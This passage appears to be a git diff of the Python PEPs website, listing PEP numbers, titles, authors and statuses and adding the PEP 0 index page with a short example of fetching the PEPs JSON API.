SF | 526 | Syntax for Variable Annotations | Ryan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum | 3.6
SF | 527 | Removing Un(der)used file types/extensions on PyPI | Donald Stufft
SF | 528 | Change Windows console encoding to UTF-8 | Steve Dower | 3.6
SF | 529 | Change Windows filesystem encoding to UTF-8 | Steve Dower | 3.6
SF | 530 | Asynchronous Comprehensions | Yury Selivanov | 3.6
SW | 531 | Existence checking operators | Alyssa Coghlan | 3.7
SD | 532 | A circuit breaking protocol and binary operators | Alyssa Coghlan, Mark E. Haase | 3.8
SD | 533 | Deterministic cleanup for iterators | Nathaniel J. Smith
SD | 534 | Improved Errors for Missing Standard Library Modules | Tomáš Orsava, Petr Viktorin, Alyssa Coghlan
SD | 535 | Rich comparison chaining | Alyssa Coghlan | 3.8
SW | 536 | Final Grammar for Literal String Interpolation | Philipp Angerer | 3.7
IF | 537 | Python 3.7 Release Schedule | Ned Deily | 3.7
SF | 538 | Coercing the legacy C locale to a UTF-8 based locale | Alyssa Coghlan | 3.7
SF | 539 | A New C-API for Thread-Local Storage in CPython | Erik M. Bray, Masayuki Yamamoto | 3.7
SF | 540 | Add a new UTF-8 Mode | Victor Stinner | 3.7
PF | 541 | Package Index Name Retention | Łukasz Langa
SR | 542 | Dot Notation Assignment In Function Header | Markus Meskanen
SW | 543 | A Unified TLS API for Python | Cory Benfield, Christian Heimes | 3.7
SF | 544 | Protocols: Structural subtyping (static duck typing) | Ivan Levkivskyi, Jukka Lehtosalo, Łukasz Langa | 3.8
PA | 545 | Python Documentation Translations | Julien Palard, Inada Naoki, Victor Stinner
SR | 546 | Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7 | Victor Stinner, Cory Benfield | 2.7
SD | 547 | Running extension modules using the -m option | Marcel Plch, Petr Viktorin | 3.7
SR | 548 | More Flexible Loop Control | R David Murray | 3.7
SR | 549 | Instance Descriptors | Larry Hastings | 3.7
SW | 550 | Execution Context | Yury Selivanov, Elvis Pranskevichus | 3.7
IW | 551 | Security transparency in the Python runtime | Steve Dower | 3.7
SF | 552 | Deterministic pycs | Benjamin Peterson | 3.7
SF | 553 | Built-in breakpoint() | Barry Warsaw | 3.7
SS | 554 | Multiple Interpreters in the Stdlib | Eric Snow | 3.13
SW | 555 | Context-local variables (contextvars) | Koos Zevenhoven | 3.7
SD | 556 | Threaded garbage collection | Antoine Pitrou | 3.7
SF | 557 | Data Classes | Eric V. Smith | 3.7
SW | 558 | Defined semantics for locals() | Alyssa Coghlan | 3.13
SR | 559 | Built-in noop() | Barry Warsaw | 3.7
SF | 560 | Core support for typing module and generic types | Ivan Levkivskyi | 3.7
SF | 561 | Distributing and Packaging Type Information | Ethan Smith | 3.7
SF | 562 | Module __getattr__ and __dir__ | Ivan Levkivskyi | 3.7
SA | 563 | Postponed Evaluation of Annotations | Łukasz Langa | 3.7
SF | 564 | Add new time functions with nanosecond resolution | Victor Stinner | 3.7
SF | 565 | Show DeprecationWarning in __main__ | Alyssa Coghlan | 3.7
SF | 566 | Metadata for Python Software Packages 2.1 | Dustin Ingram | 3.x
SF | 567 | Context Variables | Yury Selivanov | 3.7
SD | 568 | Generator-sensitivity for Context Variables | Nathaniel J. Smith | 3.8
IF | 569 | Python 3.8 Release Schedule | Łukasz Langa | 3.8
SF | 570 | Python Positional-Only Parameters | Larry Hastings, Pablo Galindo, Mario Corchero, Eric N. Vander Weele | 3.8
IS | 571 | The manylinux2010 Platform Tag | Mark Williams, Geoffrey Thomas, Thomas Kluyver
SF | 572 | Assignment Expressions | Chris Angelico, Tim Peters, Guido van Rossum | 3.8
SF | 573 | Module State Access from C Extension Methods | Petr Viktorin, Alyssa Coghlan, Eric Snow, Marcel Plch | 3.9
SF | 574 | Pickle protocol 5 with out-of-band data | Antoine Pitrou | 3.8
SW | 575 | Unifying function/method classes | Jeroen Demeyer | 3.8
SW | 576 | Rationalize Built-in function classes | Mark Shannon | 3.8
SW | 577 | Augmented Assignment Expressions | Alyssa Coghlan | 3.8
SF | 578 | Python Runtime Audit Hooks | Steve Dower | 3.8
IF | 579 | Refactoring C functions and methods | Jeroen Demeyer
SR | 580 | The C call protocol | Jeroen Demeyer | 3.8
PF | 581 | Using GitHub Issues for CPython | Mariatta
SR | 582 | Python local packages directory | Kushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan | 3.12
IW | 583 | A Concurrency Memory Model for Python | Jeffrey Yasskin
SF | 584 | Add Union Operators To dict | Steven D’Aprano, Brandt Bucher | 3.9
SF | 585 | Type Hinting Generics In Standard Collections | Łukasz Langa | 3.9
SF | 586 | Literal Types | Michael Lee, Ivan Levkivskyi, Jukka Lehtosalo | 3.8
SF | 587 | Python Initialization Configuration | Victor Stinner, Alyssa Coghlan | 3.8
IF | 588 | GitHub Issues Migration Plan | Mariatta
SF | 589 | TypedDict: Type Hints for Dictionaries with a Fixed Set of Keys | Jukka Lehtosalo | 3.8
SA | 590 | Vectorcall: a fast calling protocol for CPython | Mark Shannon, Jeroen Demeyer | 3.8
SF | 591 | Adding a final qualifier to typing | Michael J. Sullivan, Ivan Levkivskyi | 3.8
SF | 592 | Adding “Yank” Support to the Simple API | Donald Stufft
SF | 593 | Flexible function and variable annotations | Till Varoquaux, Konstantin Kashin | 3.9
SF | 594 | Removing dead batteries from the standard library | Christian Heimes, Brett Cannon | 3.11
IW | 595 | Improving bugs.python.org | Ezio Melotti, Berker Peksag
IA | 596 | Python 3.9 Release Schedule | Łukasz Langa | 3.9
SF | 597 | Add optional EncodingWarning | Inada Naoki | 3.10
IW | 598 | Introducing incremental feature releases | Alyssa Coghlan | 3.9
IS | 599 | The manylinux2014 Platform Tag | Dustin Ingram
SF | 600 | Future ‘manylinux’ Platform Tags for Portable Linux Built Distributions | Nathaniel J. Smith, Thomas Kluyver
SR | 601 | Forbid return/break/continue breaking out of finally | Damien George, Batuhan Taskaya | 3.8
PA | 602 | Annual Release Cycle for Python | Łukasz Langa | 3.9
S | 603 | Adding a frozenmap type to collections | Yury Selivanov
SF | 604 | Allow writing union types as X | Y | Philippe PRADOS, Maggie Moss | 3.10
IR | 605 | A rolling feature release stream for CPython | Steve Dower, Alyssa Coghlan | 3.9
SR | 606 | Python Compatibility Version | Victor Stinner | 3.9
IF | 607 | Reducing CPython’s Feature Delivery Latency | Łukasz Langa, Steve Dower, Alyssa Coghlan | 3.9
SR | 608 | Coordinated Python release | Miro Hrončok, Victor Stinner | 3.9
PA | 609 | Python Packaging Authority (PyPA) Governance | Dustin Ingram, Pradyun Gedam, Sumana Harihareswara
SF | 610 | Recording the Direct URL Origin of installed distributions | Stéphane Bidoul, Chris Jerdonek
SW | 611 | The one million limit | Mark Shannon
SF | 612 | Parameter Specification Variables | Mark Mendoza | 3.10
SF | 613 | Explicit Type Aliases | Shannon Zhu | 3.10
SF | 614 | Relaxing Grammar Restrictions On Decorators | Brandt Bucher | 3.9
SF | 615 | Support for the IANA Time Zone Database in the Standard Library | Paul Ganssle | 3.9
SF | 616 | String methods to remove prefixes and suffixes | Dennis Sweeney | 3.9
SF | 617 | New PEG parser for CPython | Guido van Rossum, Pablo Galindo, Lysandros Nikolaou | 3.9
SF | 618 | Add Optional Length-Checking To zip | Brandt Bucher | 3.10
IA | 619 | Python 3.10 Release Schedule | Pablo Galindo Salgado | 3.10
SW | 620 | Hide implementation details from the C API | Victor Stinner | 3.12
SF | 621 | Storing project metadata in pyproject.toml | Brett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, Sébastien Eustace, Thomas Kluyver, Tzu-ping Chung
SS | 622 | Structural Pattern Matching | Brandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin | 3.10
SF | 623 | Remove wstr from Unicode | Inada Naoki | 3.10
SF | 624 | Remove Py_UNICODE encoder APIs | Inada Naoki | 3.11
SA | 625 | Filename of a Source Distribution | Tzu-ping Chung, Paul Moore
SF | 626 | Precise line numbers for debugging and other tools. | Mark Shannon | 3.10
SF | 627 | Recording installed projects | Petr Viktorin
SF | 628 | Add math.tau | Alyssa Coghlan | 3.6
SF | 629 | Versioning PyPI’s Simple API | Donald Stufft
IF | 630 | Isolating Extension Modules | Petr Viktorin
SS | 631 | Dependency specification in pyproject.toml based on PEP 508 | Ofek Lev
SF | 632 | Deprecate distutils module | Steve Dower | 3.10
SR | 633 | Dependency specification in pyproject.toml using an exploded TOML table | Laurie Opperman, Arun Babu Neelicattu
SF | 634 | Structural Pattern Matching: Specification | Brandt Bucher, Guido van Rossum | 3.10
IF | 635 | Structural Pattern Matching: Motivation and Rationale | Tobias Kohn, Guido van Rossum | 3.10
IF | 636 | Structural Pattern Matching: Tutorial | Daniel F Moisset | 3.10
SR | 637 | Support for indexing with keyword arguments | Stefano Borini | 3.10
S | 638 | Syntactic Macros | Mark Shannon
SP | 639 | Improving License Clarity with Better Package Metadata | Philippe Ombredanne, C.A.M. Gerlach, Karolina Surma
SR | 640 | Unused variable syntax | Thomas Wouters | 3.10
SR | 641 | Using an underscore in the version portion of Python 3.10 compatibility tags | Brett Cannon, Steve Dower, Barry Warsaw | 3.10
SR | 642 | Explicit Pattern Syntax for Structural Pattern Matching | Alyssa Coghlan | 3.10
SF | 643 | Metadata for Package Source Distributions | Paul Moore
SF | 644 | Require OpenSSL 1.1.1 or newer | Christian Heimes | 3.10
SW | 645 | Allow writing optional types as x? | Maggie Moss
SF | 646 | Variadic Generics | Mark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles | 3.11
SF | 647 | User-Defined Type Guards | Eric Traut | 3.10
SR | 648 | Extensible customizations of the interpreter at startup | Mario Corchero | 3.11
SA | 649 | Deferred Evaluation Of Annotations Using Descriptors | Larry Hastings | 3.14
SW | 650 | Specifying Installer Requirements for Python Projects | Vikram Jayanthi, Dustin Ingram, Brett Cannon
SR | 651 | Robust Stack Overflow Handling | Mark Shannon
SF | 652 | Maintaining the Stable ABI | Petr Viktorin | 3.10
S | 653 | Precise Semantics for Pattern Matching | Mark Shannon
SF | 654 | Exception Groups and except* | Irit Katriel, Yury Selivanov, Guido van Rossum | 3.11
SF | 655 | Marking individual TypedDict items as required or potentially-missing | David Foster | 3.11
SF | 656 | Platform Tag for Linux Distributions Using Musl | Tzu-ping Chung
SF | 657 | Include Fine Grained Error Locations in Tracebacks | Pablo Galindo, Batuhan Taskaya, Ammar Askar | 3.11
SA | 658 | Serve Distribution Metadata in the Simple Repository API | Tzu-ping Chung
IF | 659 | Specializing Adaptive Interpreter | Mark Shannon
SF | 660 | Editable installs for pyproject.toml based builds (wheel based) | Daniel Holth, Stéphane Bidoul
S | 661 | Sentinel Values | Tal Einat
SR | 662 | Editable installs via virtual wheels | Bernát Gábor
IR | 663 | Standardizing Enum str(), repr(), and format() behaviors | Ethan Furman | 3.11
IA | 664 | Python 3.11 Release Schedule | Pablo Galindo Salgado | 3.11
SR | 665 | A file format to list Python dependencies for reproducibility of an application | Brett Cannon, Pradyun Gedam, Tzu-ping Chung
SR | 666 | Reject Foolish Indentation | Laura Creighton | 2.2
SF | 667 | Consistent views of namespaces | Mark Shannon, Tian Gao | 3.13
SA | 668 | Marking Python base environments as “externally managed” | Geoffrey Thomas, Matthias Klose, Filipe Laíns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam
SF | 669 | Low Impact Monitoring for CPython | Mark Shannon | 3.12
SF | 670 | Convert macros to functions in the Python C API | Erlend Egeberg Aasland, Victor Stinner | 3.11
S | 671 | Syntax for late-bound function argument defaults | Chris Angelico | 3.12
IA | 672 | Unicode-related Security Considerations for Python | Petr Viktorin
SF | 673 | Self Type | Pradeep Kumar Srinivasan, James Hilton-Balfe | 3.11
SD674Disallow using macros as l-valuesVictor Stinner3.12
SF675Arbitrary Literal String TypePradeep Kumar Srinivasan, Graham Bleaney3.11
PA676PEP Infrastructure ProcessAdam Turner
SR677Callable Type SyntaxSteven Troxler, Pradeep Kumar Srinivasan3.11
SF678Enriching Exceptions with NotesZac Hatfield-Dodds3.11
S679Allow parentheses in assert statementsPablo Galindo Salgado3.12
SF680tomllib: Support for Parsing TOML in the Standard LibraryTaneli Hukkinen, Shantanu Jain3.11
SF681Data Class TransformsErik De Bonte, Eric Traut3.11
SF682Format Specifier for Signed ZeroJohn Belmonte3.11
SF683Immortal Objects, Using a Fixed RefcountEric Snow, Eddie Elizondo3.12
SF684A Per-Interpreter GILEric Snow3.12
SA685Comparison of extra names for optional distribution dependenciesBrett Cannon
SA686Make UTF-8 mode defaultInada Naoki3.15
SA687Isolating modules in the standard libraryErlend Egeberg Aasland, Petr Viktorin3.12
SF688Making the buffer protocol accessible in PythonJelle Zijlstra3.12
SF689Unstable C API tierPetr Viktorin3.12
SR690Lazy ImportsGermán Méndez Bravo, Carl Meyer3.12
SA691JSON-based Simple API for Python Package IndexesDonald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram
SF692Using TypedDict for more precise **kwargs typingFranek Magiera3.12
IA693Python 3.12 Release ScheduleThomas Wouters3.12
S694Upload 2.0 API for Python Package RepositoriesDonald Stufft
SF695Type Parameter SyntaxEric Traut3.12
SF696Type Defaults for Type ParametersJames Hilton-Balfe3.13
SF697Limited C API for Extending Opaque TypesPetr Viktorin3.12
SF698Override Decorator for Static TypingSteven Troxler, Joshua Xu, Shannon Zhu3.12
SA699Remove private dict version field added in PEP 509Ken Jin3.12
SF700Additional Fields for the Simple API for Package IndexesPaul Moore
SA701Syntactic formalization of f-stringsPablo Galindo, Batuhan Taskaya, Lysandros Nikolaou, Marta Gómez Macías3.12
SF702Marking deprecations using the type systemJelle Zijlstra3.13
SA703Making the Global Interpreter Lock Optional in CPythonSam Gross3.13
SW704Require virtual environments by default for package installersPradyun Gedam
SF705TypedDict: Read-only itemsAlice Purcell3.13
SF706Filter for tarfile.extractallPetr Viktorin3.12
SR707A simplified signature for __exit__ and __aexit__Irit Katriel3.12
SP708Extending the Repository API to Mitigate Dependency Confusion AttacksDonald Stufft
SF709Inlined comprehensionsCarl Meyer3.12
S710Recording the provenance of installed packagesFridolín Pokorný
S711PyBI: a standard format for distributing Python BinariesNathaniel J. Smith
SR712Adding a “converter” parameter to dataclasses.fieldJoshua Cannon3.13
SR713Callable ModulesAmethyst Reese3.12
SA714Rename dist-info-metadata in the Simple APIDonald Stufft
SF715Disabling bdist_egg distribution uploads on PyPIWilliam Woodruff
S718Subscriptable functionsJames Hilton-Balfe3.13
IA719Python 3.13 Release ScheduleThomas Wouters3.13
I720Cross-compiling Python packagesFilipe Laíns3.12
SF721Using tarfile.data_filter for source distribution extractionPetr Viktorin3.12
SR722Dependency specification for single-file scriptsPaul Moore
SF723Inline script metadataOfek Lev
SW724Stricter Type GuardsRich Chiodo, Eric Traut, Erik De Bonte3.13
S725Specifying external dependencies in pyproject.tomlPradyun Gedam, Ralf Gommers
SR726Module __setattr__ and __delattr__Sergey B Kirpichev3.13
S727Documentation in Annotated MetadataSebastián Ramírez3.13
S728TypedDict with Typed Extra ItemsZixuan James Li3.14
PA729Typing governance processJelle Zijlstra, Shantanu Jain
SF730Adding iOS as a supported platformRussell Keith-Magee3.13
PA731C API Working Group CharterGuido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel
PA732The Python Documentation Editorial BoardJoanna Jablonski
IF733An Evaluation of Python’s Public C APIErlend Egeberg Aasland, Domenico Andreoli, Stefan Behnel, Carl Friedrich Bolz-Tereick, Simon Cross, Steve Dower, Tim Felgentreff, David Hewitt, Shantanu Jain, Wenzel Jakob, Irit Katriel, Marc-Andre Lemburg, Donghee Na, Karl Nelson, Ronald Oussoren, Antoine Pitrou, Neil Schemenauer, Mark Shannon, Stepan Sindelar, Gregory P. Smith, Eric Snow, Victor Stinner, Guido van Rossum, Petr Viktorin, Carol Willing, William Woodruff, David Woods, Jelle Zijlstra
SD734Multiple Interpreters in the StdlibEric Snow3.13
SA735Dependency Groups in pyproject.tomlStephen Rosen
S736Shorthand syntax for keyword arguments at invocationJoshua Bambrick, Chris Angelico3.14
SF737C API to format a type fully qualified nameVictor Stinner3.13
SF738Adding Android as a supported platformMalcolm Smith3.13
S739Static description file for build details of Python installationsFilipe Laíns3.14
SF740Index support for digital attestationsWilliam Woodruff, Facundo Tuesca, Dustin Ingram
SF741Python Configuration C APIVictor Stinner3.14
SF742Narrowing types with TypeIsJelle Zijlstra3.13
S743Add Py_COMPAT_API_VERSION to the Python C APIVictor Stinner, Petr Viktorin3.14
I744JIT CompilationBrandt Bucher, Savannah Ostrowski3.13
IA745Python 3.14 Release ScheduleHugo van Kemenade3.14
S746Type checking Annotated metadataAdrian Garcia Badaracco3.14
S747Annotating Type FormsDavid Foster, Eric Traut3.14
S748A Unified TLS API for PythonJoop van de Pol, William Woodruff3.14
S749Implementing PEP 649Jelle Zijlstra3.14
S750Template StringsJim Baker, Guido van Rossum, Paul Everitt, Koudai Aono, Lysandros Nikolaou, Dave Peck3.14
S751A file format to record Python dependencies for installation reproducibilityBrett Cannon
S752Implicit namespaces for package repositoriesOfek Lev
SA753Uniform project URLs in core metadataWilliam Woodruff, Facundo Tuesca
SR754IEEE 754 Floating Point Special ValuesGregory R. Warnes2.3
P755Implicit namespace policy for PyPIOfek Lev
SW756Add PyUnicode_Export() and PyUnicode_Import() C functionsVictor Stinner3.14
SF757C API to import-export Python integersSergey B Kirpichev, Victor Stinner3.14
S758Allow except and except* expressions without parenthesesPablo Galindo, Brett Cannon3.14
S759External Wheel HostingBarry Warsaw, Ethan Smith
SW760No More Bare ExceptsPablo Galindo, Brett Cannon3.14
PA761Deprecating PGP signatures for CPython artifactsSeth Michael Larson3.14
IF762REPL-acing the default REPLPablo Galindo Salgado, Łukasz Langa, Lysandros Nikolaou, Emily Morehouse-Valcarcel3.13
S763Limiting deletions on PyPIWilliam Woodruff, Alexis Challande
S765Disallow return/break/continue that exit a finally blockIrit Katriel, Alyssa Coghlan3.14
I766Explicit Priority Choices Among Multiple IndexesMichael Sarahan
S767Annotating Read-Only AttributesEneg3.14
S768Safe external debugger interface for CPythonPablo Galindo Salgado, Matt Wozniski, Ivona Stojanovic3.14
S777How to Re-invent the WheelEthan Smith
S789Preventing task-cancellation bugs by limiting yield in async generatorsZac Hatfield-Dodds, Nathaniel J. Smith3.14
IA801ReservedBarry Warsaw
P2026Calendar versioning for PythonHugo van Kemenade3.26
PF3000Python 3000Guido van Rossum
PW3001Procedure for reviewing and improving standard library modulesGeorg Brandl
PF3002Procedure for Backwards-Incompatible ChangesSteven Bethard
PF3003Python Language MoratoriumBrett Cannon, Jesse Noller, Guido van Rossum
PF3099Things that will Not Change in Python 3000Georg Brandl
PF3100Miscellaneous Python 3.0 PlansBrett Cannon
SF3101Advanced String FormattingTalin3.0
SF3102Keyword-Only ArgumentsTalin3.0
SR3103A Switch/Case StatementGuido van Rossum3.0
SF3104Access to Names in Outer ScopesKa-Ping Yee3.0
SF3105Make print a functionGeorg Brandl3.0
SF3106Revamping dict.keys(), .values() and .items()Guido van Rossum3.0
SF3107Function AnnotationsCollin Winter, Tony Lownds3.0
SF3108Standard Library ReorganizationBrett Cannon3.0
SF3109Raising Exceptions in Python 3000Collin Winter3.0
SF3110Catching Exceptions in Python 3000Collin Winter3.0
SF3111Simple input built-in in Python 3000Andre Roberge3.0
SF3112Bytes literals in Python 3000Jason Orendorff3.0
SF3113Removal of Tuple Parameter UnpackingBrett Cannon3.0
SF3114Renaming iterator.next() to iterator.__next__()Ka-Ping Yee3.0
SF3115Metaclasses in Python 3000Talin3.0
SF3116New I/ODaniel Stutzbach, Guido van Rossum, Mike Verdone3.0
SR3117Postfix type declarationsGeorg Brandl3.0
SF3118Revising the buffer protocolTravis Oliphant, Carl Banks3.0
SF3119Introducing Abstract Base ClassesGuido van Rossum, Talin3.0
SF3120Using UTF-8 as the default source encodingMartin von Löwis3.0
SF3121Extension Module Initialization and FinalizationMartin von Löwis3.0
SR3122Delineation of the main moduleBrett Cannon
SF3123Making PyObject_HEAD conform to standard CMartin von Löwis3.0
SD3124Overloading, Generic Functions, Interfaces, and AdaptationPhillip J. Eby
SR3125Remove Backslash ContinuationJim J. Jewett
SR3126Remove Implicit String ConcatenationJim J. Jewett, Raymond Hettinger
SF3127Integer Literal Support and SyntaxPatrick Maupin3.0
SR3128BList: A Faster List-like TypeDaniel Stutzbach2.6, 3.0
SF3129Class DecoratorsCollin Winter3.0
SR3130Access to Current Module/Class/FunctionJim J. Jewett3.0
SF3131Supporting Non-ASCII IdentifiersMartin von Löwis3.0
SF3132Extended Iterable UnpackingGeorg Brandl3.0
SR3133Introducing RolesCollin Winter3.0
SF3134Exception Chaining and Embedded TracebacksKa-Ping Yee3.0
SF3135New SuperCalvin Spealman, Tim Delaney, Lie Ryan3.0
SR3136Labeled break and continueMatt Chisholm3.1
SF3137Immutable Bytes and Mutable BufferGuido van Rossum3.0
SF3138String representation in Python 3000Atsuo Ishimoto3.0
SR3139Cleaning out sys and the “interpreter” moduleBenjamin Peterson3.0
SR3140str(container) should call str(item), not repr(item)Oleg Broytman, Jim J. Jewett
SF3141A Type Hierarchy for NumbersJeffrey Yasskin3.0
SR3142Add a “while” clause to generator expressionsGerald Britton3.0
SD3143Standard daemon process libraryBen Finney3.x
SF3144IP Address Manipulation Library for the Python Standard LibraryPeter Moody3.3
SW3145Asynchronous I/O For subprocess.PopenEric Pruitt, Charles R. McCreary, Josiah Carlson3.2
SW3146Merging Unladen Swallow into CPythonCollin Winter, Jeffrey Yasskin, Reid Kleckner3.3
SF3147PYC Repository DirectoriesBarry Warsaw3.2
SF3148futures - execute computations asynchronouslyBrian Quinlan3.2
SF3149ABI version tagged .so filesBarry Warsaw3.2
SD3150Statement local namespaces (aka “given” clause)Alyssa Coghlan3.4
SF3151Reworking the OS and IO exception hierarchyAntoine Pitrou3.3
SR3152CofunctionsGregory Ewing3.3
SS3153Asynchronous IO supportLaurens Van Houtven
SF3154Pickle protocol version 4Antoine Pitrou3.4
SF3155Qualified name for classes and functionsAntoine Pitrou3.3
SF3156Asynchronous IO Support Rebooted: the “asyncio” ModuleGuido van Rossum3.3
IF3333Python Web Server Gateway Interface v1.0.1Phillip J. Eby
IF8000Python Language Governance Proposal OverviewBarry Warsaw
PF8001Python Governance Voting ProcessBrett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, Łukasz Langa, Mariatta, Nathaniel J. Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware
IF8002Open Source Governance SurveyBarry Warsaw, Łukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing
IR8010The Technical Leader Governance ModelBarry Warsaw
IR8011Python Governance Model Lead by Trio of PythonistasMariatta, Barry Warsaw
IR8012The Community Governance ModelŁukasz Langa
IR8013The External Council Governance ModelSteve Dower
IR8014The Commons Governance ModelJack Jansen
IR8015Organization of the Python communityVictor Stinner
IA8016The Steering Council ModelNathaniel J. Smith, Donald Stufft
IF8100January 2019 Steering Council electionNathaniel J. Smith, Ee Durbin
IF81012020 Term Steering Council electionEwa Jodlowska, Ee Durbin
IF81022021 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81032022 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81042023 Term Steering Council electionEe Durbin
IF81052024 Term Steering Council electionEe Durbin
IF81062025 Term Steering Council electionEe Durbin
\ No newline at end of file
diff --git a/objects.inv b/objects.inv
new file mode 100644
index 00000000000..b447d00028e
Binary files /dev/null and b/objects.inv differ
diff --git a/pep-0000/index.html b/pep-0000/index.html
new file mode 100644
index 00000000000..12986b08679
--- /dev/null
+++ b/pep-0000/index.html
@@ -0,0 +1,5375 @@
PEP 0 – Index of Python Enhancement Proposals (PEPs)

Author: The PEP Editors
Status: Active
Type: Informational
Created: 13-Jul-2000

Introduction

This PEP contains the index of all Python Enhancement Proposals, known as PEPs. PEP numbers are assigned by the PEP editors and, once assigned, are never changed. The version control history of the PEP texts represents their historical record.

Topics

PEPs for specialist subjects are indexed by topic.

API

The PEPs API is a JSON file of metadata about all the published PEPs, served at https://peps.python.org/api/peps.json.
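As an illustrative sketch, the index can be consumed with nothing more than the standard library; the endpoint above is the published one, while field names such as "status" and "title" are assumptions to verify against the live payload:

    import json
    from urllib.request import urlopen

    # Fetch metadata for every published PEP as a single JSON object,
    # keyed by PEP number.
    with urlopen("https://peps.python.org/api/peps.json") as response:
        peps = json.load(response)

    # Print each Active PEP, ordered by number.
    for number, meta in sorted(peps.items(), key=lambda item: int(item[0])):
        if meta.get("status") == "Active":
            print(number, meta.get("title"))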

Numerical Index

The numerical index contains a table of all PEPs, ordered by number. In this and every table below, the letters before a PEP's number encode its type (S: Standards Track, I: Informational, P: Process) and status (A: Accepted or Active, D: Deferred, F: Final, P: Provisional, R: Rejected, S: Superseded, W: Withdrawn; no second letter means Draft).

Index by Category


Process and Meta-PEPs

PEP | Title | Authors | Python version
PA1PEP Purpose and GuidelinesBarry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan
PA2Procedure for Adding New ModulesBrett Cannon, Martijn Faassen
PA4Deprecation of Standard ModulesBrett Cannon, Martin von Löwis
PA7Style Guide for C CodeGuido van Rossum, Barry Warsaw
PA8Style Guide for Python CodeGuido van Rossum, Barry Warsaw, Alyssa Coghlan
PA10Voting GuidelinesBarry Warsaw
PA11CPython platform supportMartin von Löwis, Brett Cannon
PA12Sample reStructuredText PEP TemplateDavid Goodger, Barry Warsaw, Brett Cannon
PA13Python Language GovernanceThe Python core team and community
PA387Backwards Compatibility PolicyBenjamin Peterson
PA545Python Documentation TranslationsJulien Palard, Inada Naoki, Victor Stinner
PA602Annual Release Cycle for PythonŁukasz Langa3.9
PA609Python Packaging Authority (PyPA) GovernanceDustin Ingram, Pradyun Gedam, Sumana Harihareswara
PA676PEP Infrastructure ProcessAdam Turner
PA729Typing governance processJelle Zijlstra, Shantanu Jain
PA731C API Working Group CharterGuido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel
PA732The Python Documentation Editorial BoardJoanna Jablonski
PA761Deprecating PGP signatures for CPython artifactsSeth Michael Larson3.14

Other Informational PEPs

PEP | Title | Authors | Python version
IA20The Zen of PythonTim Peters
IA101Doing Python Releases 101Barry Warsaw, Guido van Rossum
IF247API for Cryptographic Hash FunctionsA.M. Kuchling
IF248Python Database API Specification v1.0Greg Stein, Marc-André Lemburg
IF249Python Database API Specification v2.0Marc-André Lemburg
IA257Docstring ConventionsDavid Goodger, Guido van Rossum
IF272API for Block Encryption Algorithms v1.0A.M. Kuchling
IA287reStructuredText Docstring FormatDavid Goodger
IA290Code Migration and ModernizationRaymond Hettinger
IF333Python Web Server Gateway Interface v1.0Phillip J. Eby
IA394The “python” Command on Unix-Like SystemsKerrick Staley, Alyssa Coghlan, Barry Warsaw, Petr Viktorin, Miro Hrončok, Carol Willing
IF399Pure Python/C Accelerator Module Compatibility RequirementsBrett Cannon3.3
IF430Migrating to Python 3 as the default online documentationAlyssa Coghlan
IA434IDLE Enhancement Exception for All BranchesTodd Rovito, Terry Reedy
IF452API for Cryptographic Hash Functions v2.0A.M. Kuchling, Christian Heimes
IF457Notation For Positional-Only ParametersLarry Hastings
IF482Literature Overview for Type HintsŁukasz Langa
IF483The Theory of Type HintsGuido van Rossum, Ivan Levkivskyi
IA514Python registration in the Windows registrySteve Dower
IF579Refactoring C functions and methodsJeroen Demeyer
IF588GitHub Issues Migration PlanMariatta
IA596Python 3.9 Release ScheduleŁukasz Langa3.9
IF607Reducing CPython’s Feature Delivery LatencyŁukasz Langa, Steve Dower, Alyssa Coghlan3.9
IA619Python 3.10 Release SchedulePablo Galindo Salgado3.10
IF630Isolating Extension ModulesPetr Viktorin
IF635Structural Pattern Matching: Motivation and RationaleTobias Kohn, Guido van Rossum3.10
IF636Structural Pattern Matching: TutorialDaniel F Moisset3.10
IF659Specializing Adaptive InterpreterMark Shannon
IA664Python 3.11 Release SchedulePablo Galindo Salgado3.11
IA672Unicode-related Security Considerations for PythonPetr Viktorin
IA693Python 3.12 Release ScheduleThomas Wouters3.12
IA719Python 3.13 Release ScheduleThomas Wouters3.13
IF733An Evaluation of Python’s Public C APIErlend Egeberg Aasland, Domenico Andreoli, Stefan Behnel, Carl Friedrich Bolz-Tereick, Simon Cross, Steve Dower, Tim Felgentreff, David Hewitt, Shantanu Jain, Wenzel Jakob, Irit Katriel, Marc-Andre Lemburg, Donghee Na, Karl Nelson, Ronald Oussoren, Antoine Pitrou, Neil Schemenauer, Mark Shannon, Stepan Sindelar, Gregory P. Smith, Eric Snow, Victor Stinner, Guido van Rossum, Petr Viktorin, Carol Willing, William Woodruff, David Woods, Jelle Zijlstra
IA745Python 3.14 Release ScheduleHugo van Kemenade3.14
IF762REPL-acing the default REPLPablo Galindo Salgado, Łukasz Langa, Lysandros Nikolaou, Emily Morehouse-Valcarcel3.13
IA801ReservedBarry Warsaw
IF3333Python Web Server Gateway Interface v1.0.1Phillip J. Eby
IF8000Python Language Governance Proposal OverviewBarry Warsaw
IF8002Open Source Governance SurveyBarry Warsaw, Łukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing
IA8016The Steering Council ModelNathaniel J. Smith, Donald Stufft
IF8100January 2019 Steering Council electionNathaniel J. Smith, Ee Durbin
IF81012020 Term Steering Council electionEwa Jodlowska, Ee Durbin
IF81022021 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81032022 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81042023 Term Steering Council electionEe Durbin
IF81052024 Term Steering Council electionEe Durbin
IF81062025 Term Steering Council electionEe Durbin

